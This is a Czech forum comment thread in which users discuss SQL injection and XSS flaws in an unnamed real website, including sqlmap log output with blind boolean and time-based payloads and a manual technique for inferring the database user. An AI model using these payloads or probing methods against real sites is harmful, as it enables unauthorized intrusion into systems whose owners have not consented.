| asi si jejich produkty koupim :)
admin je na /editor/ :)
(odpovědět) | |
|
|
| a kde je to SQLi?
----------
hack or be hacked :-) .. by greyhats
(odpovědět) | |
|
|
| V každém URL :)
BTW: XSS je standardní výbavou snad každého webu, takže proč jej nedat třeba do vyhledávání, abychom nebyli pozadu... :)
----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem.
(odpovědět) | |
|
|
| asi jsem slepej nebo uz prepracovanej.. muzes poslat priklad prosim?
----------
hack or be hacked :-) .. by greyhats
(odpovědět) | |
|
|
| u me v sqlmap logu:
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: [link] AND 3293=3293 AND 'qOXd'='qOXd
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: [link] AND SLEEP(5) AND 'MaHk'='MaHk
(odpovědět) | |
|
|
| to je sice hezky.. to muzu pustit taky.. ale kdyz to zkousim "manualne" tak nic nevidim .. jak je to mozny?
----------
hack or be hacked :-) .. by greyhats
(odpovědět) | |
|
|
| myslim si, ze pokud je to "blind" tak hodnoty neuvidis
(odpovědět) | |
|
|
| Přesně jak píše Reverend, je to blind SQLi, takže odezva je jen v tom, jak se stránka chová.
Pokud přidám na konec AND USER() = 'user12 , tak se stránka zobrazí, resp. nezobrazí se 404, jen v případě, že skript přistupuje do DB pod uživatelem user12. Jinak podmínka neplatí.
(odpovědět) | | Miroslav Koucký | 2a01:430:d:0:2cc:d1ff:feb0:* | 13.11.2014 16:27 |
|
|
|
| ja xss nejak nevim neumim neznam k cemu :) ale po tvych kurzech ktery budou, tak budu doufat ze budu chytrejsi :)
(odpovědět) | |
|
|
